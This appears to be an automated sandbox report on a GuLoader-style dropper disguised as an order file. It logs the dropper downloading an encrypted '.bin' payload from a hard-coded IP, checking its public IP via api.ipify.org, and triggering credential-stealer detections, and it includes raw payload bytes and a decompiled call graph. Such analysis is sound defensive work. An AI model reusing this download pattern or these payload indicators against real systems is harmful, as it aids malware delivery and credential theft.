                                                Jul 1, 2024 12:10:22.883860111 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884099960 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884151936 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884165049 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884200096 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884212971 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884224892 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884248018 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884259939 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884272099 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884277105 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884300947 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884314060 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884325981 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884327888 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884356022 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884371042 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884383917 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884406090 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884406090 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884423018 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884434938 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884447098 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884459972 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884470940 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884473085 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884494066 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884506941 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884519100 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884556055 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884568930 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884581089 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884601116 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884613037 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884624958 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884654999 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884665966 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884665966 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884763956 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884776115 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884813070 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884823084 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884826899 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884876013 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884886980 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.884927988 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.884941101 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885035038 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885042906 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885051012 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885063887 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885077000 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885121107 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885127068 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885173082 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885183096 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885198116 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885210037 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885276079 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885328054 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885344028 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885356903 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885369062 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885407925 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885426044 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885440111 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885452032 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885459900 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885459900 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885466099 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885487080 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885499001 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885508060 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885552883 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885556936 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885571003 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885658026 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885745049 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.885746956 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885802031 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:10:22.885914087 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:22.886121988 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:10:24.622785091 CEST54358443192.168.11.30172.67.74.152
                                                Jul 1, 2024 12:10:24.622872114 CEST44354358172.67.74.152192.168.11.30
                                                Jul 1, 2024 12:10:24.623226881 CEST54358443192.168.11.30172.67.74.152
                                                Jul 1, 2024 12:10:24.661750078 CEST54358443192.168.11.30172.67.74.152
                                                Jul 1, 2024 12:10:24.661777973 CEST44354358172.67.74.152192.168.11.30
                                                Jul 1, 2024 12:10:24.916212082 CEST44354358172.67.74.152192.168.11.30
                                                Jul 1, 2024 12:10:24.916439056 CEST54358443192.168.11.30172.67.74.152
                                                Jul 1, 2024 12:10:24.918631077 CEST54358443192.168.11.30172.67.74.152
                                                Jul 1, 2024 12:10:24.918653011 CEST44354358172.67.74.152192.168.11.30
                                                Jul 1, 2024 12:10:24.919306993 CEST44354358172.67.74.152192.168.11.30
                                                Jul 1, 2024 12:10:24.955771923 CEST54358443192.168.11.30172.67.74.152
                                                Jul 1, 2024 12:10:24.996190071 CEST44354358172.67.74.152192.168.11.30
                                                Jul 1, 2024 12:10:25.209517956 CEST44354358172.67.74.152192.168.11.30
                                                Jul 1, 2024 12:10:25.209583998 CEST44354358172.67.74.152192.168.11.30
                                                Jul 1, 2024 12:10:25.209731102 CEST54358443192.168.11.30172.67.74.152
                                                Jul 1, 2024 12:10:25.210421085 CEST54358443192.168.11.30172.67.74.152
                                                Jul 1, 2024 12:12:11.178637028 CEST5435780192.168.11.30109.248.151.29
                                                Jul 1, 2024 12:12:11.419455051 CEST8054357109.248.151.29192.168.11.30
                                                Jul 1, 2024 12:12:11.419737101 CEST5435780192.168.11.30109.248.151.29
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 1, 2024 12:10:24.498366117 CEST4923253192.168.11.301.1.1.1
                                                Jul 1, 2024 12:10:24.617609978 CEST53492321.1.1.1192.168.11.30
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jul 1, 2024 12:10:24.498366117 CEST192.168.11.301.1.1.10xfaa0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jul 1, 2024 12:10:24.617609978 CEST1.1.1.1192.168.11.300xfaa0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Jul 1, 2024 12:10:24.617609978 CEST1.1.1.1192.168.11.300xfaa0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Jul 1, 2024 12:10:24.617609978 CEST1.1.1.1192.168.11.300xfaa0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                • api.ipify.org
                                                • 109.248.151.29
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.3054357109.248.151.29808160C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                TimestampBytes transferredDirectionData
                                                Jul 1, 2024 12:10:21.427661896 CEST183OUTGET /DttVKmqMztLpGMCsim17.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: 109.248.151.29
                                                Cache-Control: no-cache
                                                Jul 1, 2024 12:10:21.670203924 CEST1289INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Mon, 01 Jul 2024 05:34:18 GMT
                                                Accept-Ranges: bytes
                                                ETag: "b36ad05178cbda1:0"
                                                Server: Microsoft-IIS/8.5
                                                Date: Mon, 01 Jul 2024 10:10:21 GMT
                                                Content-Length: 241728
                                                Data Raw: 9e 20 0c 55 35 64 80 37 86 7b 7e 63 78 44 c1 6b 85 3e 06 91 d8 2d 01 9b 34 a5 3c 76 da 6c 68 a5 a0 89 70 a7 81 12 3a 6a 8c 01 c5 c8 01 73 00 70 76 69 d7 de 8b c1 e8 c0 0f 15 c9 80 e3 1f 9e fb 3d 47 98 7f 6f 5d 27 a9 58 78 94 ee ab 21 89 86 e9 a7 56 3b 6d a1 7b 3a 4b b5 e5 0e 12 ee fe 20 26 25 84 cb 88 34 cc 43 48 d3 37 e3 c9 4a 8d cc 14 15 d2 30 eb 24 40 bc 81 50 b8 84 92 61 01 fc 31 7a 2e de aa e0 b4 bb 81 8f ac ac 07 0f 1f 33 d8 09 5c f1 9c d9 aa e9 b2 b1 bf 4c 49 d1 08 38 5b 2a 03 a8 ef 13 a2 e3 7b de f9 75 60 83 5f 8f d6 e4 e7 90 6f 50 8d 84 bf 57 5d b1 6d ee d5 56 ec 09 ca 57 c1 cf 2a b9 09 a4 00 28 e2 e3 ce ad c4 56 c5 a2 ab b7 e1 ca 2c 43 27 5a 5a fe 89 ea 89 eb da 78 3a d6 e2 e7 b0 47 d1 26 a5 69 de 71 e5 b2 66 9d 4a 52 41 91 20 b2 b8 8b 93 4c bd e8 67 34 5c b3 36 7d 70 ca fe cd 8b 32 28 00 6b 4c a8 a5 08 6a 50 1e e8 43 57 65 ea 5e f9 74 c4 b8 df f2 8a 67 83 63 19 c2 7c 0e 3b 19 c3 07 bc 4d bb 69 29 96 be 9d c5 aa 86 3c 0b 37 e2 6d 9d 6e fa eb e9 5d 7d c5 f3 ab 17 a2 a5 06 b3 7f d8 c4 50 18 [TRUNCATED]
                                                Data Ascii: U5d7{~cxDk>-4<vlhp:jspvi=Go]'Xx!V;m{:K &%4CH7J0$@Pa1z.3\LI8[*{u`_oPW]mVW*(V,C'ZZx:G&iqfJRA Lg4\6}p2(kLjPCWe^tgc|;Mi)<7mn]}P+@JXg}0LJtI"mJ,_lX0lJY6|-B&7()c:r_2 a0fw?nRH7]Ra}\Y\<8oW.rzL6)}pj^<{tv^:?,3xW [z;pC'{iCf]H\RKA(3$~:a7"C5"=ou"#dR-b(>}al9_AO5,:F"l@&K}"("+8$D&\kJ#$@J\8F~K2?B&eMo(HNS`R/"l~aW<yf}58=T76@_d~x1CS4<<TrhvJxIhxT?VfI=_K8FL-(s4%T`jf0 }.wJl0!h}A"s.s9i0 [TRUNCATED]
                                                Jul 1, 2024 12:10:21.670219898 CEST1289INData Raw: 31 f2 3e c9 a8 2a 17 f4 d2 51 c7 59 8f 7a 19 72 d3 73 26 3c 96 38 b2 9d 6f a7 ee d0 c9 8f a2 fb 27 10 f7 0f 9b 32 01 ec ca a2 37 88 eb 6a fc 31 c8 21 e0 d4 0d 48 fe 8b 98 92 4a f1 cf 10 5a 23 ab b5 47 4e 9a e5 71 05 a3 e3 0b 82 87 bc 23 7a ad b5
                                                Data Ascii: 1>*QYzrs&<8o'27j1!HJZ#GNq#zNnY8f!dTXM}7*`j`%]qQBFt'&3sx1>}}-5`3Z$@C6,Y^>an8P((8,dfb(2tPz8@K]XX
                                                Jul 1, 2024 12:10:21.670248032 CEST1289INData Raw: 9d 26 ae ec 91 fe d8 e3 b9 0b e6 93 52 5c f6 ce 82 b8 26 0b 66 24 82 b5 9c 46 cd 1c de c3 66 83 8e 3a 98 ba f0 f1 77 c7 9f cc 2b f6 3e 18 72 95 d6 37 7e 74 53 c3 e3 9f 60 df 7a 46 fd 72 29 1a 8d 27 74 e6 cc ea 48 41 eb 09 c5 00 50 fa 4e 15 42 3c
                                                Data Ascii: &R\&f$Ff:w+>r7~tS`zFr)'tHAPNB<@GOC"^;}Rbyn:hCvI_|RU`71r(vL&HW&WOwfU[tj5kL~pAneuV JDY<)`
                                                Jul 1, 2024 12:10:21.670382977 CEST1289INData Raw: cb c3 6c 7b cf b8 63 3c 09 8e 87 34 5b c9 41 81 ca 14 ac a3 b7 fe 91 73 b7 a0 eb cd 61 90 a9 70 31 61 db ba 00 b0 35 91 6a 64 a2 b2 2f 95 24 46 60 f0 22 4a 31 53 a0 fa 88 12 8a 50 cf 98 bd 94 c6 fa 25 9a 87 96 47 e6 27 42 81 84 28 3d a7 ff ff 98
                                                Data Ascii: l{c<4[Asap1a5jd/$F`"J1SP%G'B(=_<}eQ#ZfOS0m{;)<W vxE&`|Kb8+r>r7~tX`gl)'t(qmj:J<ai$w1
                                                Jul 1, 2024 12:10:21.911412001 CEST1289INData Raw: 90 96 00 7e c4 6f 37 1c 22 bd ec 35 11 c5 a5 ae 89 9c 53 23 04 85 6f cb ae ec 70 8f fa 22 90 14 dd 5c 3a 34 0f 64 fd a8 ba e8 81 17 ea c5 ac 1a cf b0 70 f6 68 d6 95 8e de f0 65 91 df d9 cf 72 3e 9f ad 5b 23 16 1f 54 a2 4e 17 a1 3d eb d4 4b e3 1c
                                                Data Ascii: ~o7"5S#op"\:4dpher>[#TN=KTn>~'n"%elM&Du`^Fey"0ZlnrEn<3Hq%`r?n^ebK.RDiY0-'WCG%x_$_0r
                                                Jul 1, 2024 12:10:21.911449909 CEST1289INData Raw: f7 33 6a f5 72 2e 48 37 3d 5d 25 f6 f2 06 7e 74 5c 1f 81 a3 91 bc bc b9 77 0b 1c fd 36 71 6e 0f 6b 01 77 2c 72 9d cf 08 c2 4c 36 59 33 c3 98 74 c0 64 d3 8f 8e 31 77 16 89 1f de f3 75 71 fd 8c f6 19 1a 7c 4b 3a 91 67 83 3b e9 ab 39 1b 86 5b de 95
                                                Data Ascii: 3jr.H7=]%~t\w6qnkw,rL6Y3td1wuq|K:g;9[j gv?pk'qACl3zj[]B^z]G)5+>~<;",5PMou#dEqzhpews.aY#6YDpK%T1"{6nz"
                                                Jul 1, 2024 12:10:21.911561012 CEST1289INData Raw: ab 17 62 ab 06 f5 7a 55 f1 50 18 2a be e3 4b 11 b5 5a 87 d8 ea 00 69 f1 c5 a4 7a a5 0f fe 97 a5 7d 30 8a f4 4d a3 da d7 e8 f3 f2 b6 4b 1e 2e f3 74 11 49 50 1e e7 b2 6f e8 99 dc 2c dd 9e a1 dc d0 b6 6c 5c f7 ce 58 25 39 6c e5 08 38 4b 60 dd 36 7c
                                                Data Ascii: bzUP*KZiz}0MK.tIPo,l\X%9l8K`6|(!E7+-z:r0'TXa8ffk)2nRF4=#,y\/=oW\ql3)=j~Dq2_ udR;?,xW ]XZ6pC
                                                Jul 1, 2024 12:10:21.911597013 CEST1289INData Raw: 8e e9 1c 5f b1 1d 4c f5 47 bc 4c ca a9 83 cd 29 b9 0b 43 23 4e c2 ea ce ad c4 a8 c4 9b 53 b7 e3 cb d9 4e 2d 5a 7a 5f 8a ea 89 cb e3 78 3a dc 40 c7 54 82 d2 26 5b 47 dd 71 e5 ac 69 9e 4a 72 01 91 20 92 46 8a aa 44 bd e8 63 34 7c b2 36 7d 70 34 f4
                                                Data Ascii: _LGL)C#NSN-Zz_x:@T&[GqiJr FDc4|6}p42hLjPzRe^q=||}ik-+7m`/eZPARXyG6L<DFwI"J_lX@JY>8}b&
                                                Jul 1, 2024 12:10:21.911633015 CEST1289INData Raw: 1f ae 7e 3f 8d 15 90 22 7c 44 45 7b 22 73 e6 cd 12 a3 c4 b5 97 d6 ee a8 cd 49 13 08 7f 6c 65 9e ac 5c 78 b4 f8 54 de 89 78 5f ab 56 3b 93 ad 77 3a 2b a7 e5 0e 12 10 ff 19 3d 25 84 cb 76 38 c8 43 60 97 37 e3 c3 c6 ce cc 14 14 2c 3e eb 24 60 af 81
                                                Data Ascii: ~?"|DE{"sIle\xTx_V;w:+=%v8C`7,>$`PzmiKv.K[Ovx"'(FW/asWu!EA]pT]+\BBW).B0VK5&{ZZXtG:_&iqR=RRcR6}!(kjPSe
                                                Jul 1, 2024 12:10:21.911660910 CEST1289INData Raw: 8d 87 35 52 63 57 a3 3f 45 a4 76 13 4f bd c4 d1 e7 63 74 0b 6c 8b 87 39 e2 0a d7 f5 13 cc 70 c2 07 2a 01 26 cc dd 0b 3c 30 8e 2a 5e 7e cf a1 d8 fa 81 34 22 81 89 9d 1b 72 9e d1 6d 0d f3 8b 80 14 6c d0 1e 09 d9 f4 7e f9 90 da 8b f4 76 83 6b 49 7e
                                                Data Ascii: 5RcW?EvOctl9p*&<0*^~4"rml~vkI~qZ6O&pR.2Z"y(r<*rlZ?"|DE{"sIl]\xZZ;M{:K7 ,J%0$@P2a?lv7
                                                Jul 1, 2024 12:10:21.911681890 CEST1289INData Raw: f7 ea ea 76 7b a8 d9 98 22 19 59 05 d4 0e 4f e2 13 1a b7 5b cc 5e 98 f3 64 2d 17 f3 7c 83 e5 ef 55 0c 20 22 84 4a 7d 1a 03 f3 24 f9 a3 4c c0 f6 e9 2f 98 0e 06 7e 73 42 98 76 fc c8 2c fc 51 80 06 89 02 1e 3a 08 40 6f d0 a0 2a 02 7a 72 34 4f 45 8f
                                                Data Ascii: v{"YO[^d-|U "J}$L/~sBv,Q:@o*zr4OEdwU^qC OYW"N&Tl2h-=bpGdKf(/!z9RcW_u8ouM*(<|$}r_-?D%&F~e\*}Z7m.O


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.11.3054358172.67.74.1524438160C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-01 10:10:24 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-07-01 10:10:25 UTC211INHTTP/1.1 200 OK
                                                Date: Mon, 01 Jul 2024 10:10:25 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 89c59b2b0c2c6207-ORD
                                                2024-07-01 10:10:25 UTC12INData Raw: 38 31 2e 31 38 31 2e 36 32 2e 39 39
                                                Data Ascii: 81.181.62.99


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:5
                                                Start time:06:10:03
                                                Start date:01/07/2024
                                                Path:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Order 00293884800595.bat.exe"
                                                Imagebase:0x400000
                                                File size:507'437 bytes
                                                MD5 hash:EFD3BF2442D368363512548564A51050
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1802216811117.0000000005184000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:8
                                                Start time:06:10:13
                                                Start date:01/07/2024
                                                Path:C:\Users\user\Desktop\Order 00293884800595.bat.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Order 00293884800595.bat.exe"
                                                Imagebase:0x400000
                                                File size:507'437 bytes
                                                MD5 hash:EFD3BF2442D368363512548564A51050
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1807122448137.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:22.1%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.2%
                                                  Total number of Nodes:1551
                                                  Total number of Limit Nodes:41
                                                  execution_graph 3904 4015c2 3908 402c5e 3904->3908 3907 4015db 3909 402c6a 3908->3909 3914 406320 3909->3914 3912 4015c9 SetFileAttributesA 3912->3907 3915 40632d 3914->3915 3916 40656e 3915->3916 3919 406545 lstrlenA 3915->3919 3920 406320 15 API calls 3915->3920 3924 40644c GetSystemDirectoryA 3915->3924 3925 406462 GetWindowsDirectoryA 3915->3925 3926 406587 5 API calls 3915->3926 3927 4064ee lstrcatA 3915->3927 3928 406320 15 API calls 3915->3928 3930 4064c5 SHGetPathFromIDListA CoTaskMemFree 3915->3930 3940 406174 3915->3940 3945 4066b5 GetModuleHandleA 3915->3945 3951 4061eb wsprintfA 3915->3951 3952 40628d lstrcpynA 3915->3952 3917 402c8b 3916->3917 3953 40628d lstrcpynA 3916->3953 3917->3912 3931 406587 3917->3931 3919->3915 3920->3919 3924->3915 3925->3915 3926->3915 3927->3915 3928->3915 3930->3915 3938 406593 3931->3938 3932 4065fb 3933 4065ff CharPrevA 3932->3933 3935 40661a 3932->3935 3933->3932 3934 4065f0 CharNextA 3934->3932 3934->3938 3935->3912 3937 4065de CharNextA 3937->3938 3938->3932 3938->3934 3938->3937 3939 4065eb CharNextA 3938->3939 3961 405c4a 3938->3961 3939->3934 3954 406113 3940->3954 3943 4061d7 3943->3915 3944 4061a8 RegQueryValueExA RegCloseKey 3944->3943 3946 4066d1 3945->3946 3947 4066db GetProcAddress 3945->3947 3958 406647 GetSystemDirectoryA 3946->3958 3948 4066ea 3947->3948 3948->3915 3950 4066d7 3950->3947 3950->3948 3951->3915 3952->3915 3953->3917 3955 406122 3954->3955 3956 406126 3955->3956 3957 40612b RegOpenKeyExA 3955->3957 3956->3943 3956->3944 3957->3956 3959 406669 wsprintfA LoadLibraryExA 3958->3959 3959->3950 3962 405c50 3961->3962 3963 405c63 3962->3963 3964 405c56 CharNextA 3962->3964 3963->3938 3964->3962 3965 401a43 3966 402c5e 21 API calls 3965->3966 3967 401a4c ExpandEnvironmentStringsA 3966->3967 3968 401a60 3967->3968 3970 401a73 3967->3970 3969 401a65 lstrcmpA 3968->3969 3968->3970 3969->3970 3971 402543 3982 402c9e 3971->3982 3974 402c5e 21 API calls 3975 402556 3974->3975 3976 402560 RegQueryValueExA 3975->3976 3980 4027ed 3975->3980 3977 402580 3976->3977 3981 402586 RegCloseKey 3976->3981 3977->3981 3987 4061eb wsprintfA 3977->3987 3981->3980 3983 402c5e 21 API calls 3982->3983 3984 402cb5 3983->3984 3985 406113 RegOpenKeyExA 3984->3985 3986 40254d 3985->3986 3986->3974 3987->3981 5031 401744 5032 402c5e 21 API calls 5031->5032 5033 40174b SearchPathA 5032->5033 5034 401766 5033->5034 5035 401d44 5036 402c3c 21 API calls 5035->5036 5037 401d4b 5036->5037 5038 402c3c 21 API calls 5037->5038 5039 401d57 GetDlgItem 5038->5039 5040 40264d 5039->5040 5041 402ac5 SendMessageA 5042 402adf InvalidateRect 5041->5042 5043 402aea 5041->5043 5042->5043 5044 405345 5045 405355 5044->5045 5046 405369 5044->5046 5047 40535b 5045->5047 5056 4053b2 5045->5056 5048 405371 IsWindowVisible 5046->5048 5052 405388 5046->5052 5050 404379 SendMessageA 5047->5050 5051 40537e 5048->5051 5048->5056 5049 4053b7 CallWindowProcA 5053 405365 5049->5053 5050->5053 5057 404c80 SendMessageA 5051->5057 5052->5049 5062 404d00 5052->5062 5056->5049 5058 404ca3 GetMessagePos ScreenToClient SendMessageA 5057->5058 5059 404cdf SendMessageA 5057->5059 5060 404cd7 5058->5060 5061 404cdc 5058->5061 5059->5060 5060->5052 5061->5059 5071 40628d lstrcpynA 5062->5071 5064 404d13 5072 4061eb wsprintfA 5064->5072 5066 404d1d 5067 40140b 2 API calls 5066->5067 5068 404d26 5067->5068 5073 40628d lstrcpynA 5068->5073 5070 404d2d 5070->5056 5071->5064 5072->5066 5073->5070 3988 4023c9 3989 4023d1 3988->3989 3990 4023d7 3988->3990 3991 402c5e 21 API calls 3989->3991 3992 402c5e 21 API calls 3990->3992 3993 4023e7 3990->3993 3991->3990 3992->3993 3994 402c5e 21 API calls 3993->3994 3996 4023f5 3993->3996 3994->3996 3995 402c5e 21 API calls 3997 4023fe WritePrivateProfileStringA 3995->3997 3996->3995 3998 4020ca 3999 40218a 3998->3999 4000 4020dc 3998->4000 4003 401423 28 API calls 3999->4003 4001 402c5e 21 API calls 4000->4001 4002 4020e3 4001->4002 4004 402c5e 21 API calls 4002->4004 4009 40230f 4003->4009 4005 4020ec 4004->4005 4006 402101 LoadLibraryExA 4005->4006 4007 4020f4 GetModuleHandleA 4005->4007 4006->3999 4008 402111 GetProcAddress 4006->4008 4007->4006 4007->4008 4010 402120 4008->4010 4011 40215d 4008->4011 4013 402128 4010->4013 4014 40213f 4010->4014 4064 4053d1 4011->4064 4061 401423 4013->4061 4019 6ca5176b 4014->4019 4016 402130 4016->4009 4017 40217e FreeLibrary 4016->4017 4017->4009 4020 6ca5179b 4019->4020 4075 6ca51b28 4020->4075 4022 6ca517a2 4023 6ca518c4 4022->4023 4024 6ca517b3 4022->4024 4025 6ca517ba 4022->4025 4023->4016 4125 6ca5233f 4024->4125 4109 6ca52381 4025->4109 4030 6ca51800 4138 6ca52568 4030->4138 4031 6ca5181e 4036 6ca51824 4031->4036 4037 6ca5186c 4031->4037 4032 6ca517d0 4035 6ca517d6 4032->4035 4039 6ca517e1 4032->4039 4033 6ca517e9 4046 6ca517df 4033->4046 4135 6ca52d53 4033->4135 4035->4046 4119 6ca52ac8 4035->4119 4157 6ca515fb 4036->4157 4043 6ca52568 11 API calls 4037->4043 4038 6ca51806 4149 6ca515e9 4038->4149 4129 6ca52742 4039->4129 4044 6ca5185d 4043->4044 4052 6ca518b3 4044->4052 4163 6ca5252e 4044->4163 4046->4030 4046->4031 4050 6ca517e7 4050->4046 4051 6ca52568 11 API calls 4051->4044 4052->4023 4056 6ca518bd GlobalFree 4052->4056 4056->4023 4058 6ca5189f 4058->4052 4167 6ca51572 wsprintfA 4058->4167 4059 6ca51898 FreeLibrary 4059->4058 4062 4053d1 28 API calls 4061->4062 4063 401431 4062->4063 4063->4016 4065 4053ec 4064->4065 4074 40548f 4064->4074 4066 405409 lstrlenA 4065->4066 4067 406320 21 API calls 4065->4067 4068 405432 4066->4068 4069 405417 lstrlenA 4066->4069 4067->4066 4071 405445 4068->4071 4072 405438 SetWindowTextA 4068->4072 4070 405429 lstrcatA 4069->4070 4069->4074 4070->4068 4073 40544b SendMessageA SendMessageA SendMessageA 4071->4073 4071->4074 4072->4071 4073->4074 4074->4016 4170 6ca512a5 GlobalAlloc 4075->4170 4077 6ca51b4f 4171 6ca512a5 GlobalAlloc 4077->4171 4079 6ca51d90 GlobalFree GlobalFree GlobalFree 4080 6ca51dad 4079->4080 4093 6ca51df7 4079->4093 4081 6ca52181 4080->4081 4089 6ca51dc2 4080->4089 4080->4093 4083 6ca521a3 GetModuleHandleA 4081->4083 4081->4093 4082 6ca51c4d GlobalAlloc 4099 6ca51b5a 4082->4099 4086 6ca521b4 LoadLibraryA 4083->4086 4087 6ca521c9 4083->4087 4084 6ca51c98 lstrcpyA 4088 